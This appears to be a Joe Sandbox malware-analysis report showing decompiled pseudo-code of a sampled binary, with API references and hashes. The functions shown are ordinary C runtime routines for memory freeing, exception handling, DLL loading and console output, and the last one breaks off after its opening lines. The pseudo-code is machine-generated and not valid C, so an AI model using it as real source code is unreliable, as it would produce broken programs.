                          												E01355C8F( *((intOrPtr*)(_t250 + 0x24 + _t261 * 8)));
                          												E01355C8F( *(_t250 + 0xa0 + _t213 * 4));
                          												_t236 = _v704;
                          												 *(_v712 + _t250) = _t236;
                          												 *(_t250 + 0xa0 + _t213 * 4) = _t236;
                          											}
                          										}
                          										_t234 = _v724;
                          										 *_t234 = 1;
                          										 *((intOrPtr*)(_t250 + 0x28 + (_t213 + _t213) * 8)) = _t234;
                          									} else {
                          										 *((intOrPtr*)(_v712 + _t250)) = _t233;
                          										E01355C8F( *(_t250 + 0xa0 + _t213 * 4));
                          										 *(_t250 + 0xa0 + _t213 * 4) = _v740;
                          										E01355C8F(_v724);
                          										 *(_t250 + 8) = _v744;
                          										goto L40;
                          									}
                          									goto L41;
                          								}
                          							}
                          						} else {
                          							L41:
                          							_pop(_t254);
                          							return E0132EA79(_v8 ^ _t265, _t254);
                          						}
                          						goto L52;
                          					}
                          					asm("sbb eax, eax");
                          					_t167 = _t166 | 0x00000001;
                          					__eflags = _t167;
                          					goto L9;
                          				}
                          				L52:
                          			}

                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • _free.LIBCMT ref: 01354B6D
                          • _free.LIBCMT ref: 01354B86
                          • _free.LIBCMT ref: 01354BC4
                          • _free.LIBCMT ref: 01354BCD
                          • _free.LIBCMT ref: 01354BD9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$ErrorLast
                          • String ID: C
                          • API String ID: 3291180501-1037565863
                          • Opcode ID: 64f1e31e09e2cb5cc8f12b63e41ef0405bb8ebb8611086ef44e096412ca59440
                          • Instruction ID: a01bdc90e248ce4a85a2a058d3a275f11bdfa9674082294292d05bea86edf085
                          • Opcode Fuzzy Hash: 64f1e31e09e2cb5cc8f12b63e41ef0405bb8ebb8611086ef44e096412ca59440
                          • Instruction Fuzzy Hash: 5BB15C75A0121A9FDB68DF18C884FA9B7B5FF48718F5045AAD94AA7350E730AED0CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E01345BB0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v5;
                          				signed int _v12;
                          				char _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				char _v32;
                          				char _t52;
                          				signed int _t59;
                          				intOrPtr _t60;
                          				void* _t61;
                          				intOrPtr* _t62;
                          				intOrPtr _t64;
                          				intOrPtr _t66;
                          				intOrPtr _t68;
                          				intOrPtr* _t72;
                          				intOrPtr _t73;
                          				intOrPtr _t75;
                          				signed int _t78;
                          				char _t80;
                          				intOrPtr _t92;
                          				intOrPtr _t95;
                          				intOrPtr* _t97;
                          				void* _t101;
                          				void* _t103;
                          				void* _t110;
                          
                          				_t72 = _a4;
                          				_push(__edi);
                          				_v5 = 0;
                          				_v16 = 1;
                          				 *_t72 = E0136542E(__ecx,  *_t72);
                          				_t73 = _a8;
                          				_t6 = _t73 + 0x10; // 0x11
                          				_t95 = _t6;
                          				_push(_t95);
                          				_v20 = _t95;
                          				_v12 =  *(_t73 + 8) ^  *0x13a4018;
                          				E01345B70(__edi, _t95,  *(_t73 + 8) ^  *0x13a4018);
                          				E01348F3C(_a12);
                          				_t52 = _a4;
                          				_t103 = _t101 - 0x1c + 0x10;
                          				_t92 =  *((intOrPtr*)(_t73 + 0xc));
                          				if(( *(_t52 + 4) & 0x00000066) != 0) {
                          					__eflags = _t92 - 0xfffffffe;
                          					if(_t92 != 0xfffffffe) {
                          						E013490EC(_t73, 0xfffffffe, _t95, 0x13a4018);
                          						goto L13;
                          					}
                          					goto L14;
                          				} else {
                          					_v32 = _t52;
                          					_v28 = _a12;
                          					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
                          					if(_t92 == 0xfffffffe) {
                          						L14:
                          						return _v16;
                          					} else {
                          						do {
                          							_t78 = _v12;
                          							_t59 = _t92 + (_t92 + 2) * 2;
                          							_t75 =  *((intOrPtr*)(_t78 + _t59 * 4));
                          							_t60 = _t78 + _t59 * 4;
                          							_t79 =  *((intOrPtr*)(_t60 + 4));
                          							_v24 = _t60;
                          							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                          								_t80 = _v5;
                          								goto L7;
                          							} else {
                          								_t61 = E0134909C(_t79, _t95);
                          								_t80 = 1;
                          								_v5 = 1;
                          								_t110 = _t61;
                          								if(_t110 < 0) {
                          									_v16 = 0;
                          									L13:
                          									_push(_t95);
                          									E01345B70(_t92, _t95, _v12);
                          									goto L14;
                          								} else {
                          									if(_t110 > 0) {
                          										_t62 = _a4;
                          										__eflags =  *_t62 - 0xe06d7363;
                          										if( *_t62 == 0xe06d7363) {
                          											__eflags =  *0x1379c98;
                          											if(__eflags != 0) {
                          												_t68 = E01364EA0(__eflags, 0x1379c98);
                          												_t103 = _t103 + 4;
                          												__eflags = _t68;
                          												if(_t68 != 0) {
                          													_t97 =  *0x1379c98; // 0x13459a8
                          													 *0x1374358(_a4, 1);
                          													 *_t97();
                          													_t95 = _v20;
                          													_t103 = _t103 + 8;
                          												}
                          												_t62 = _a4;
                          											}
                          										}
                          										E013490D0(_t62, _a8, _t62);
                          										_t64 = _a8;
                          										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t92;
                          										if( *((intOrPtr*)(_t64 + 0xc)) != _t92) {
                          											E013490EC(_t64, _t92, _t95, 0x13a4018);
                          											_t64 = _a8;
                          										}
                          										_push(_t95);
                          										 *((intOrPtr*)(_t64 + 0xc)) = _t75;
                          										E01345B70(_t92, _t95, _v12);
                          										E013490B4();
                          										asm("int3");
                          										_t66 =  *0x13aaf7c; // 0x0
                          										return _t66;
                          									} else {
                          										goto L7;
                          									}
                          								}
                          							}
                          							goto L23;
                          							L7:
                          							_t92 = _t75;
                          						} while (_t75 != 0xfffffffe);
                          						if(_t80 != 0) {
                          							goto L13;
                          						}
                          						goto L14;
                          					}
                          				}
                          				L23:
                          			}

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 01345BE7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 01345BEF
                          • _ValidateLocalCookies.LIBCMT ref: 01345C78
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 01345CA3
                          • _ValidateLocalCookies.LIBCMT ref: 01345CF8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 19398d06db0ed54fcc1ff5c98093c919310370cc47f65e098d64d3a3ac69d2fc
                          • Instruction ID: f07b5992215e2905251d64a2b07a0211042a58221f4a8f2f45548b2d10254e92
                          • Opcode Fuzzy Hash: 19398d06db0ed54fcc1ff5c98093c919310370cc47f65e098d64d3a3ac69d2fc
                          • Instruction Fuzzy Hash: DF41AF34E00219ABCF20DF6CC880A9EBBF9AF4532CF148255E918AB351D731AA55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01355E9F(void* __ecx, signed int* _a4, intOrPtr _a8) {
                          				signed int* _v8;
                          				void** _t12;
                          				void* _t16;
                          				void* _t18;
                          				signed int _t22;
                          				WCHAR* _t23;
                          				void** _t26;
                          				signed int* _t29;
                          				void* _t32;
                          				void* _t34;
                          
                          				_t29 = _a4;
                          				while(_t29 != _a8) {
                          					_t22 =  *_t29;
                          					_t12 = 0x13ab3c8 + _t22 * 4;
                          					_t32 =  *_t12;
                          					_v8 = _t12;
                          					if(_t32 == 0) {
                          						_t23 =  *(0x137c368 + _t22 * 4);
                          						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                          						if(_t32 != 0) {
                          							L12:
                          							_t26 = _v8;
                          							 *_t26 = _t32;
                          							if( *_t26 != 0) {
                          								FreeLibrary(_t32);
                          							}
                          							L14:
                          							if(_t32 != 0) {
                          								_t16 = _t32;
                          								L18:
                          								return _t16;
                          							}
                          							L15:
                          							_t29 =  &(_t29[1]);
                          							continue;
                          						}
                          						_t18 = GetLastError();
                          						if(_t18 != 0x57) {
                          							L9:
                          							_t32 = 0;
                          							L10:
                          							if(_t32 != 0) {
                          								goto L12;
                          							}
                          							 *_v8 = _t18 | 0xffffffff;
                          							goto L15;
                          						}
                          						_t18 = E01355668(_t23, L"api-ms-", 7);
                          						_t34 = _t34 + 0xc;
                          						if(_t18 == 0) {
                          							goto L9;
                          						}
                          						_t18 = E01355668(_t23, L"ext-ms-", 7);
                          						_t34 = _t34 + 0xc;
                          						if(_t18 == 0) {
                          							goto L9;
                          						}
                          						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                          						_t32 = _t18;
                          						goto L10;
                          					}
                          					if(_t32 == 0xffffffff) {
                          						goto L15;
                          					}
                          					goto L14;
                          				}
                          				_t16 = 0;
                          				goto L18;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID:
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 0-537541572
                          • Opcode ID: c35c7fd04a7ad938224373d46bcdcb6d1ce159ed0a18b6e1b71eb9f7f04ddcad
                          • Instruction ID: 00724cc42c8916f83742d8b2b0397b0513e9154b5330b35b73a86559d541ab23
                          • Opcode Fuzzy Hash: c35c7fd04a7ad938224373d46bcdcb6d1ce159ed0a18b6e1b71eb9f7f04ddcad
                          • Instruction Fuzzy Hash: B921D671A06225EBDB724A6D9C84E6E7B5C9F05F68F150121FD0AB7281D730FD04C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0135D4F6(intOrPtr _a4) {
                          				void* _t18;
                          
                          				_t45 = _a4;
                          				if(_a4 != 0) {
                          					E0135D242(_t45, 7);
                          					E0135D242(_t45 + 0x1c, 7);
                          					E0135D242(_t45 + 0x38, 0xc);
                          					E0135D242(_t45 + 0x68, 0xc);
                          					E0135D242(_t45 + 0x98, 2);
                          					E01355C8F( *((intOrPtr*)(_t45 + 0xa0)));
                          					E01355C8F( *((intOrPtr*)(_t45 + 0xa4)));
                          					E01355C8F( *((intOrPtr*)(_t45 + 0xa8)));
                          					E0135D242(_t45 + 0xb4, 7);
                          					E0135D242(_t45 + 0xd0, 7);
                          					E0135D242(_t45 + 0xec, 0xc);
                          					E0135D242(_t45 + 0x11c, 0xc);
                          					E0135D242(_t45 + 0x14c, 2);
                          					E01355C8F( *((intOrPtr*)(_t45 + 0x154)));
                          					E01355C8F( *((intOrPtr*)(_t45 + 0x158)));
                          					E01355C8F( *((intOrPtr*)(_t45 + 0x15c)));
                          					return E01355C8F( *((intOrPtr*)(_t45 + 0x160)));
                          				}
                          				return _t18;
                          			}

                          APIs
                            • Part of subcall function 0135D242: _free.LIBCMT ref: 0135D267
                          • _free.LIBCMT ref: 0135D544
                            • Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
                            • Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7
                          • _free.LIBCMT ref: 0135D54F
                          • _free.LIBCMT ref: 0135D55A
                          • _free.LIBCMT ref: 0135D5AE
                          • _free.LIBCMT ref: 0135D5B9
                          • _free.LIBCMT ref: 0135D5C4
                          • _free.LIBCMT ref: 0135D5CF
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: fc33f1fcddaa056387f76da6a3bebe0f877ee113259183eaaa33493f47ce9eac
                          • Instruction ID: f12120cbdf166d7c1f856566719e1c0dd0fd5d7e4e78e1a3c91e9c6f94600fbd
                          • Opcode Fuzzy Hash: fc33f1fcddaa056387f76da6a3bebe0f877ee113259183eaaa33493f47ce9eac
                          • Instruction Fuzzy Hash: 2411BB31901B05AADBA0BBF9CC05FEB779CAF60B58F400D14AE9BA6095DB34F5008B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E0135F41D(void* __ebx, void* __edi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				char _v16;
                          				char _v23;
                          				char _v24;
                          				void _v32;
                          				signed int _v33;
                          				long _v40;
                          				signed int _v44;
                          				intOrPtr _v48;
                          				char _v51;
                          				void _v52;
                          				long _v56;
                          				char _v60;
                          				intOrPtr _v68;
                          				char _v72;
                          				struct _OVERLAPPED* _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				long _v92;
                          				intOrPtr _v96;
                          				long _v100;
                          				signed char* _v104;
                          				signed char* _v108;
                          				void* _v112;
                          				intOrPtr _v116;
                          				char _v120;
                          				int _v124;
                          				intOrPtr _v128;
                          				struct _OVERLAPPED* _v132;
                          				struct _OVERLAPPED* _v136;
                          				struct _OVERLAPPED* _v140;
                          				struct _OVERLAPPED* _v144;
                          				void* __esi;
                          				signed int _t170;
                          				signed int _t172;
                          				int _t178;
                          				intOrPtr _t183;
                          				intOrPtr _t186;
                          				void* _t188;
                          				void* _t190;
                          				long _t193;
                          				void _t198;
                          				signed char* _t202;
                          				void* _t206;
                          				struct _OVERLAPPED* _t211;
                          				void* _t220;
                          				long _t224;
                          				intOrPtr _t225;
                          				char _t227;
                          				void* _t237;
                          				struct _OVERLAPPED* _t242;
                          				signed int _t245;
                          				intOrPtr _t248;
                          				signed int _t251;
                          				signed int _t252;
                          				signed int _t254;
                          				intOrPtr _t256;
                          				void* _t262;
                          				intOrPtr _t263;
                          				signed int _t264;
                          				signed int _t267;
                          				signed char _t268;
                          				intOrPtr _t271;
                          				signed int _t273;
                          				long _t274;
                          				signed int _t275;
                          				signed char* _t278;
                          				signed int _t282;
                          				signed int _t284;
                          				void* _t286;
                          				signed int _t289;
                          				signed int _t290;
                          				intOrPtr _t291;
                          				signed int _t292;
                          				struct _OVERLAPPED* _t294;
                          				struct _OVERLAPPED* _t296;
                          				signed int _t298;
                          				signed int _t300;
                          				void* _t301;
                          				void* _t303;
                          
                          				_t298 = _t300;
                          				_t301 = _t300 - 0x8c;
                          				_t170 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t170 ^ _t298;
                          				_t172 = _a8;
                          				_t267 = _t172 >> 6;
                          				_t245 = (_t172 & 0x0000003f) * 0x38;
                          				_t278 = _a12;
                          				_v108 = _t278;
                          				_v80 = _t267;
                          				_v112 =  *((intOrPtr*)(_t245 +  *((intOrPtr*)(0x13ab590 + _t267 * 4)) + 0x18));
                          				_v44 = _t245;
                          				_v96 = _a16 + _t278;
                          				_t178 = GetConsoleOutputCP();
                          				_t242 = 0;
                          				_v124 = _t178;
                          				E01349944( &_v72, _t267, 0);
                          				_t284 = 0;
                          				_v92 = 0;
                          				_v88 = 0;
                          				_v84 = 0;
                          				_t248 =  *((intOrPtr*)(_v68 + 8));
                          				_v128 = _t248;
                          				_v104 = _t278;
                          				if(_t278 >= _v96) {
                          					L49:
                          					__eflags = _v60 - _t242;
                          				} else {
                          					while(1) {
                          						_t251 = _v44;
                          						_v51 =  *_t278;
                          						_v76 = _t242;
                          						_v40 = 1;
                          						_t186 =  *((intOrPtr*)(0x13ab590 + _v80 * 4));
                          						_v48 = _t186;
                          						if(_t248 != 0xfde9) {
                          							goto L20;
                          						}
                          						_t211 = _t242;
                          						_t271 = _v48 + 0x2e + _t251;
                          						_v116 = _t271;
                          						while( *((intOrPtr*)(_t271 + _t211)) != _t242) {
                          							_t211 =  &(_t211->Internal);
                          							if(_t211 < 5) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t273 = _v96 - _t278;
                          						_v40 = _t211;
                          						if(_t211 <= 0) {
                          							_t72 = ( *_t278 & 0x000000ff) + 0x13a49a0; // 0x0
                          							_t256 =  *_t72 + 1;
                          							_v48 = _t256;
                          							__eflags = _t256 - _t273;
                          							if(_t256 > _t273) {
                          								__eflags = _t273;
                          								if(_t273 <= 0) {
                          									goto L41;
                          								} else {
                          									_t290 = _v44;
                          									do {
                          										 *((char*)( *((intOrPtr*)(0x13ab590 + _v80 * 4)) + _t290 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t278));
                          										_t242 =  &(_t242->Internal);
                          										__eflags = _t242 - _t273;
                          									} while (_t242 < _t273);
                          									goto L40;
                          								}
                          							} else {
                          								_v144 = _t242;
                          								__eflags = _t256 - 4;
                          								_v140 = _t242;
                          								_v56 = _t278;
                          								_v40 = (_t256 == 4) + 1;
                          								_t220 = E013606FE( &_v144,  &_v76,  &_v56, (_t256 == 4) + 1,  &_v144);
                          								_t303 = _t301 + 0x10;
                          								__eflags = _t220 - 0xffffffff;
                          								if(_t220 == 0xffffffff) {
                          									goto L49;
                          								} else {
                          									_t291 = _v48;
                          									goto L19;
                          								}
                          							}
                          						} else {
                          							_t224 =  *((char*)(( *(_t251 + _v48 + 0x2e) & 0x000000ff) + 0x13a49a0)) + 1;
                          							_v56 = _t224;
                          							_t225 = _t224 - _v40;
                          							_v48 = _t225;
                          							if(_t225 > _t273) {
                          								__eflags = _t273;
                          								if(_t273 > 0) {
                          									_t292 = _t251;
                          									do {
                          										_t227 =  *((intOrPtr*)(_t242 + _t278));
                          										_t262 =  *((intOrPtr*)(0x13ab590 + _v80 * 4)) + _t292 + _t242;
                          										_t242 =  &(_t242->Internal);
                          										 *((char*)(_t262 + _v40 + 0x2e)) = _t227;
                          										_t292 = _v44;
                          										__eflags = _t242 - _t273;
                          									} while (_t242 < _t273);
                          									L40:
                          									_t284 = _v88;
                          								}
                          								L41:
                          								_t289 = _t284 + _t273;
                          								__eflags = _t289;
                          								L42:
                          								__eflags = _v60;
                          								_v88 = _t289;
                          							} else {
                          								_t274 = _v40;
                          								_t294 = _t242;
                          								_t263 = _v116;
                          								do {
                          									 *((char*)(_t298 + _t294 - 0xc)) =  *((intOrPtr*)(_t263 + _t294));
                          									_t294 =  &(_t294->Internal);
                          								} while (_t294 < _t274);
                          								_t295 = _v48;
                          								_t264 = _v44;
                          								if(_v48 > 0) {
                          									E01345ED0( &_v16 + _t274, _t278, _t295);
                          									_t264 = _v44;
                          									_t301 = _t301 + 0xc;
                          									_t274 = _v40;
                          								}
                          								_t282 = _v80;
                          								_t296 = _t242;
                          								do {
                          									 *( *((intOrPtr*)(0x13ab590 + _t282 * 4)) + _t264 + _t296 + 0x2e) = _t242;
                          									_t296 =  &(_t296->Internal);
                          								} while (_t296 < _t274);
                          								_t278 = _v104;
                          								_t291 = _v48;
                          								_v120 =  &_v16;
                          								_v136 = _t242;
                          								_v132 = _t242;
                          								_v40 = (_v56 == 4) + 1;
                          								_t237 = E013606FE( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
                          								_t303 = _t301 + 0x10;
                          								if(_t237 == 0xffffffff) {
                          									goto L49;
                          								} else {
                          									L19:
                          									_t278 = _t278 - 1 + _t291;
                          									L28:
                          									_t278 =  &(_t278[1]);
                          									_v104 = _t278;
                          									_t193 = E013577B7(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
                          									_t301 = _t303 + 0x20;
                          									_v56 = _t193;
                          									if(_t193 == 0) {
                          										goto L49;
                          									} else {
                          										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
                          											L48:
                          											_v92 = GetLastError();
                          											goto L49;
                          										} else {
                          											_t284 = _v84 - _v108 + _t278;
                          											_v88 = _t284;
                          											if(_v100 < _v56) {
                          												goto L49;
                          											} else {
                          												if(_v51 != 0xa) {
                          													L35:
                          													if(_t278 >= _v96) {
                          														goto L49;
                          													} else {
                          														_t248 = _v128;
                          														continue;
                          													}
                          												} else {
                          													_t198 = 0xd;
                          													_v52 = _t198;
                          													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
                          														goto L48;
                          													} else {
                          														if(_v100 < 1) {
                          															goto L49;
                          														} else {
                          															_v84 = _v84 + 1;
                          															_t284 = _t284 + 1;
                          															_v88 = _t284;
                          															goto L35;
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						goto L50;
                          						L20:
                          						_t268 =  *((intOrPtr*)(_t251 + _t186 + 0x2d));
                          						__eflags = _t268 & 0x00000004;
                          						if((_t268 & 0x00000004) == 0) {
                          							_v33 =  *_t278;
                          							_t188 = E0134BBB8(_t268);
                          							_t252 = _v33 & 0x000000ff;
                          							__eflags =  *((intOrPtr*)(_t188 + _t252 * 2)) - _t242;
                          							if( *((intOrPtr*)(_t188 + _t252 * 2)) >= _t242) {
                          								_push(1);
                          								_push(_t278);
                          								goto L27;
                          							} else {
                          								_t100 =  &(_t278[1]); // 0x1
                          								_t202 = _t100;
                          								_v56 = _t202;
                          								__eflags = _t202 - _v96;
                          								if(_t202 >= _v96) {
                          									_t275 = _v80;
                          									_t254 = _v44;
                          									 *((char*)(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2e)) = _v33;
                          									 *(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2d) =  *(_t254 +  *((intOrPtr*)(0x13ab590 + _t275 * 4)) + 0x2d) | 0x00000004;
                          									_t289 = _t284 + 1;
                          									goto L42;
                          								} else {
                          									_t206 = E013594EB( &_v76, _t278, 2);
                          									_t303 = _t301 + 0xc;
                          									__eflags = _t206 - 0xffffffff;
                          									if(_t206 == 0xffffffff) {
                          										goto L49;
                          									} else {
                          										_t278 = _v56;
                          										goto L28;
                          									}
                          								}
                          							}
                          						} else {
                          							_v24 =  *((intOrPtr*)(_t251 + _t186 + 0x2e));
                          							_v23 =  *_t278;
                          							_push(2);
                          							 *(_t251 + _v48 + 0x2d) = _t268 & 0x000000fb;
                          							_push( &_v24);
                          							L27:
                          							_push( &_v76);
                          							_t190 = E013594EB();
                          							_t303 = _t301 + 0xc;
                          							__eflags = _t190 - 0xffffffff;
                          							if(_t190 == 0xffffffff) {
                          								goto L49;
                          							} else {
                          								goto L28;
                          							}
                          						}
                          						goto L50;
                          					}
                          				}
                          				L50:
                          				if(__eflags != 0) {
                          					_t183 = _v72;
                          					_t165 = _t183 + 0x350;
                          					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
                          					__eflags =  *_t165;
                          				}
                          				__eflags = _v8 ^ _t298;
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				_pop(_t286);
                          				return E0132EA79(_v8 ^ _t298, _t286);
                          			}

                          APIs
                          • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 0135F465
                          • __fassign.LIBCMT ref: 0135F64A
                          • __fassign.LIBCMT ref: 0135F667
                          • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0135F6AF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0135F6EF
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0135F797
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 1735259414-0
                          • Opcode ID: d2bca8930e689b105abe84cef23d6813f74d04c6e4feb60d532562edafeae5a5
                          • Instruction ID: 6c1ef72ff5fce6c6ed57cae549c08344b71397d4ac28cf487559e9dbbc0f3e1a
                          • Opcode Fuzzy Hash: d2bca8930e689b105abe84cef23d6813f74d04c6e4feb60d532562edafeae5a5
                          • Instruction Fuzzy Hash: 18C19C75D002599FCB15CFE8C8809EDFFB9AF48718F28416AE855FB241E631A946CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 21%
                          			E012F7710(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				char _v52;
                          				char _v1080;
                          				char _v1084;
                          				short* _v1088;
                          				char _v1092;
                          				char _v1096;
                          				char _v1100;
                          				signed int _v1104;
                          				intOrPtr _v1108;
                          				short _v1124;
                          				signed int _v1128;
                          				char _v1132;
                          				char _v1148;
                          				intOrPtr _v1160;
                          				short _v1162;
                          				char _v1164;
                          				void* _v1168;
                          				intOrPtr* _v1172;
                          				intOrPtr _v1176;
                          				intOrPtr* _v1180;
                          				intOrPtr _v1184;
                          				char _v1188;
                          				char _v1204;
                          				short _v1208;
                          				char _v1212;
                          				char _v1228;
                          				signed int _v1232;
                          				char _v1236;
                          				short _v1252;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t118;
                          				signed int _t119;
                          				char _t121;
                          				void** _t124;
                          				signed int _t128;
                          				void* _t140;
                          				intOrPtr* _t142;
                          				intOrPtr* _t147;
                          				short _t148;
                          				intOrPtr _t153;
                          				short* _t156;
                          				signed int _t157;
                          				intOrPtr _t166;
                          				intOrPtr _t184;
                          				intOrPtr* _t187;
                          				intOrPtr _t194;
                          				short* _t197;
                          				void* _t199;
                          				intOrPtr* _t202;
                          				char _t204;
                          				void* _t207;
                          				intOrPtr* _t210;
                          				signed int _t211;
                          				void* _t212;
                          				void* _t213;
                          
                          				_t163 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1365781);
                          				_push( *[fs:0x0]);
                          				_t213 = _t212 - 0x4e4;
                          				_t118 =  *0x13a4018; // 0x39cca9f6
                          				_t119 = _t118 ^ _t211;
                          				_v20 = _t119;
                          				_push(__edi);
                          				_push(_t119);
                          				 *[fs:0x0] =  &_v16;
                          				_t202 = _a4;
                          				asm("xorps xmm0, xmm0");
                          				_t193 = _a8;
                          				asm("movq [ebp-0x440], xmm0");
                          				_v1084 = 0;
                          				_v1180 = _t202;
                          				_v1172 = _t202;
                          				_v1092 = 0;
                          				_v1088 = 0;
                          				_v1084 = 0;
